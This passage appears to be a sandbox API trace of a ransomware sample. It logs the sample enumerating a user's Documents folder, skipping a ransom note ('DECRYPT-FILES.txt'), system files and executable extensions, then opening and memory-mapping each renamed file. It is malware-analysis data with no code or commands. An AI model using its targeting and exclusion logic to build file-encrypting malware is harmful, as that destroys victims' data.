returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx.iYdHoHQ" [0184.936] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx.iYdHoHQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\ii_h.pptx.iydhohq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.936] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=37064) returned 1 [0184.936] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.936] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.937] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.937] CloseHandle (hObject=0x268) returned 1 [0184.937] CloseHandle (hObject=0x264) returned 1 [0184.937] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda6ad3b0, ftCreationTime.dwHighDateTime=0x1d4cb85, ftLastAccessTime.dwLowDateTime=0x14afb780, ftLastAccessTime.dwHighDateTime=0x1d4ca0e, ftLastWriteTime.dwLowDateTime=0xae3b9140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x12f13, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jfn8J-ja5_DT9.ppt.zTm5Eve", cAlternateFileName="JFN8J-~1.ZTM")) returned 1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="DECRYPT-FILES.txt") returned 1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="autorun.inf") returned 1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="boot.ini") returned 1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="desktop.ini") returned 1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="ntuser.dat") returned -1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="iconcache.db") returned 1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="bootsect.bak") returned 1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="ntuser.dat.log") returned -1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="thumbs.db") returned -1 [0184.938] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt.zTm5Eve", lpString2="Bootfont.bin") returned 1 [0184.938] lstrlenW (lpString="Jfn8J-ja5_DT9.ppt.zTm5Eve") returned 25 [0184.938] lstrcmpiW (lpString1="zTm5Eve", lpString2="lnk") returned 1 [0184.938] lstrcmpiW (lpString1="zTm5Eve", lpString2="exe") returned 1 [0184.938] lstrcmpiW (lpString1="zTm5Eve", lpString2="sys") returned 1 [0184.938] lstrcmpiW (lpString1="zTm5Eve", lpString2="dll") returned 1 [0184.938] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.938] lstrlenW (lpString="Jfn8J-ja5_DT9.ppt.zTm5Eve") returned 25 [0184.938] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="Jfn8J-ja5_DT9.ppt.zTm5Eve" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt.zTm5Eve") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt.zTm5Eve" [0184.938] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt.zTm5Eve" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jfn8j-ja5_dt9.ppt.ztm5eve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.939] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=77587) returned 1 [0184.939] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.939] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.941] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.941] CloseHandle (hObject=0x268) returned 1 [0184.941] CloseHandle (hObject=0x264) returned 1 [0184.941] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.941] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df75920, ftCreationTime.dwHighDateTime=0x1d4c6f4, ftLastAccessTime.dwLowDateTime=0x31902500, ftLastAccessTime.dwHighDateTime=0x1d4ca7d, ftLastWriteTime.dwLowDateTime=0xae405400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5750, dwReserved0=0x0, dwReserved1=0x0, cFileName="jM5KvsW.pps.vBde", cAlternateFileName="JM5KVS~1.VBD")) returned 1 [0184.941] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="DECRYPT-FILES.txt") returned 1 [0184.941] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="autorun.inf") returned 1 [0184.941] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="boot.ini") returned 1 [0184.941] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="desktop.ini") returned 1 [0184.942] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="ntuser.dat") returned -1 [0184.942] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="iconcache.db") returned 1 [0184.942] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="bootsect.bak") returned 1 [0184.942] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="ntuser.dat.log") returned -1 [0184.942] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="thumbs.db") returned -1 [0184.942] lstrcmpiW (lpString1="jM5KvsW.pps.vBde", lpString2="Bootfont.bin") returned 1 [0184.942] lstrlenW (lpString="jM5KvsW.pps.vBde") returned 16 [0184.942] lstrcmpiW (lpString1="vBde", lpString2="lnk") returned 1 [0184.942] lstrcmpiW (lpString1="vBde", lpString2="exe") returned 1 [0184.942] lstrcmpiW (lpString1="vBde", lpString2="sys") returned 1 [0184.942] lstrcmpiW (lpString1="vBde", lpString2="dll") returned 1 [0184.942] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.942] lstrlenW (lpString="jM5KvsW.pps.vBde") returned 16 [0184.942] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.942] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="jM5KvsW.pps.vBde" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps.vBde") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps.vBde" [0184.942] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps.vBde" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jm5kvsw.pps.vbde"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.942] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=22352) returned 1 [0184.942] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.943] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.984] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.984] CloseHandle (hObject=0x268) returned 1 [0184.984] CloseHandle (hObject=0x264) returned 1 [0184.987] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.990] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24fbcbe0, ftCreationTime.dwHighDateTime=0x1d4d4ce, ftLastAccessTime.dwLowDateTime=0x868202d0, ftLastAccessTime.dwHighDateTime=0x1d4d13b, ftLastWriteTime.dwLowDateTime=0xae42b560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4cec, dwReserved0=0x0, dwReserved1=0x0, cFileName="MxmcYlbU.docx.Pj4k", cAlternateFileName="MXMCYL~1.PJ4")) returned 1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="DECRYPT-FILES.txt") returned 1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="autorun.inf") returned 1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="boot.ini") returned 1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="desktop.ini") returned 1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="ntuser.dat") returned -1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="iconcache.db") returned 1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="bootsect.bak") returned 1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="ntuser.dat.log") returned -1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="thumbs.db") returned -1 [0184.994] lstrcmpiW (lpString1="MxmcYlbU.docx.Pj4k", lpString2="Bootfont.bin") returned 1 [0184.994] lstrlenW (lpString="MxmcYlbU.docx.Pj4k") returned 18 [0184.994] lstrcmpiW (lpString1="Pj4k", lpString2="lnk") returned 1 [0184.994] lstrcmpiW (lpString1="Pj4k", lpString2="exe") returned 1 [0184.994] lstrcmpiW (lpString1="Pj4k", lpString2="sys") returned -1 [0184.994] lstrcmpiW (lpString1="Pj4k", lpString2="dll") returned 1 [0184.994] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.994] lstrlenW (lpString="MxmcYlbU.docx.Pj4k") returned 18 [0184.994] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.994] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="MxmcYlbU.docx.Pj4k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx.Pj4k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx.Pj4k" [0184.994] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx.Pj4k" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\mxmcylbu.docx.pj4k"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.995] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=19692) returned 1 [0184.995] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.995] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.019] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.019] CloseHandle (hObject=0x268) returned 1 [0185.019] CloseHandle (hObject=0x264) returned 1 [0185.019] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.019] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243cd420, ftCreationTime.dwHighDateTime=0x1d4d2ca, ftLastAccessTime.dwLowDateTime=0xb9e43770, ftLastAccessTime.dwHighDateTime=0x1d4ca9b, ftLastWriteTime.dwLowDateTime=0xae4516c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x43ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="S46h3QD3.ppt.mu9pP", cAlternateFileName="S46H3Q~1.MU9")) returned 1 [0185.019] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="DECRYPT-FILES.txt") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="autorun.inf") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="boot.ini") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="desktop.ini") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="ntuser.dat") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="iconcache.db") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="bootsect.bak") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="ntuser.dat.log") returned 1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="thumbs.db") returned -1 [0185.020] lstrcmpiW (lpString1="S46h3QD3.ppt.mu9pP", lpString2="Bootfont.bin") returned 1 [0185.020] lstrlenW (lpString="S46h3QD3.ppt.mu9pP") returned 18 [0185.020] lstrcmpiW (lpString1="mu9pP", lpString2="lnk") returned 1 [0185.020] lstrcmpiW (lpString1="mu9pP", lpString2="exe") returned 1 [0185.020] lstrcmpiW (lpString1="mu9pP", lpString2="sys") returned -1 [0185.020] lstrcmpiW (lpString1="mu9pP", lpString2="dll") returned 1 [0185.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0185.020] lstrlenW (lpString="S46h3QD3.ppt.mu9pP") returned 18 [0185.020] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0185.020] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="S46h3QD3.ppt.mu9pP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt.mu9pP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt.mu9pP" [0185.020] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\S46h3QD3.ppt.mu9pP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\s46h3qd3.ppt.mu9pp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.021] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=17391) returned 1 [0185.021] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.021] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.029] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.029] CloseHandle (hObject=0x268) returned 1 [0185.029] CloseHandle (hObject=0x264) returned 1 [0185.029] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.029] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3488000, ftCreationTime.dwHighDateTime=0x1d4cec1, ftLastAccessTime.dwLowDateTime=0xa25a36d0, ftLastAccessTime.dwHighDateTime=0x1d4c56f, ftLastWriteTime.dwLowDateTime=0xae49d980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="TfbGpUNnTUe.docx.6QCk2n", cAlternateFileName="TFBGPU~1.6QC")) returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="DECRYPT-FILES.txt") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="autorun.inf") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="boot.ini") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="desktop.ini") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="ntuser.dat") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="iconcache.db") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="bootsect.bak") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="ntuser.dat.log") returned 1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="thumbs.db") returned -1 [0185.029] lstrcmpiW (lpString1="TfbGpUNnTUe.docx.6QCk2n", lpString2="Bootfont.bin") returned 1 [0185.029] lstrlenW (lpString="TfbGpUNnTUe.docx.6QCk2n") returned 23 [0185.029] lstrcmpiW (lpString1="6QCk2n", lpString2="lnk") returned -1 [0185.029] lstrcmpiW (lpString1="6QCk2n", lpString2="exe") returned -1 [0185.029] lstrcmpiW (lpString1="6QCk2n", lpString2="sys") returned -1 [0185.029] lstrcmpiW (lpString1="6QCk2n", lpString2="dll") returned -1 [0185.029] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0185.029] lstrlenW (lpString="TfbGpUNnTUe.docx.6QCk2n") returned 23 [0185.030] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0185.030] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="TfbGpUNnTUe.docx.6QCk2n" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx.6QCk2n") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx.6QCk2n" [0185.030] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\TfbGpUNnTUe.docx.6QCk2n" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\tfbgpunntue.docx.6qck2n"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.030] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=64195) returned 1 [0185.030] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.030] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.037] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.037] CloseHandle (hObject=0x268) returned 1 [0185.037] CloseHandle (hObject=0x264) returned 1 [0185.037] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.037] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf806cb0, ftCreationTime.dwHighDateTime=0x1d4cad0, ftLastAccessTime.dwLowDateTime=0xdca4f820, ftLastAccessTime.dwHighDateTime=0x1d4c696, ftLastWriteTime.dwLowDateTime=0xae4c3ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa719, dwReserved0=0x0, dwReserved1=0x0, cFileName="VJDs-wsG_jZz.docx.o39UsPc", cAlternateFileName="VJDS-W~1.O39")) returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="DECRYPT-FILES.txt") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="autorun.inf") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="boot.ini") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="desktop.ini") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="ntuser.dat") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="iconcache.db") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="bootsect.bak") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="ntuser.dat.log") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="thumbs.db") returned 1 [0185.037] lstrcmpiW (lpString1="VJDs-wsG_jZz.docx.o39UsPc", lpString2="Bootfont.bin") returned 1 [0185.037] lstrlenW (lpString="VJDs-wsG_jZz.docx.o39UsPc") returned 25 [0185.037] lstrcmpiW (lpString1="o39UsPc", lpString2="lnk") returned 1 [0185.037] lstrcmpiW (lpString1="o39UsPc", lpString2="exe") returned 1 [0185.037] lstrcmpiW (lpString1="o39UsPc", lpString2="sys") returned -1 [0185.037] lstrcmpiW (lpString1="o39UsPc", lpString2="dll") returned 1 [0185.037] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0185.038] lstrlenW (lpString="VJDs-wsG_jZz.docx.o39UsPc") returned 25 [0185.038] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0185.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="VJDs-wsG_jZz.docx.o39UsPc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx.o39UsPc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx.o39UsPc" [0185.038] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx.o39UsPc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\vjds-wsg_jzz.docx.o39uspc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.038] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=42777) returned 1 [0185.038] 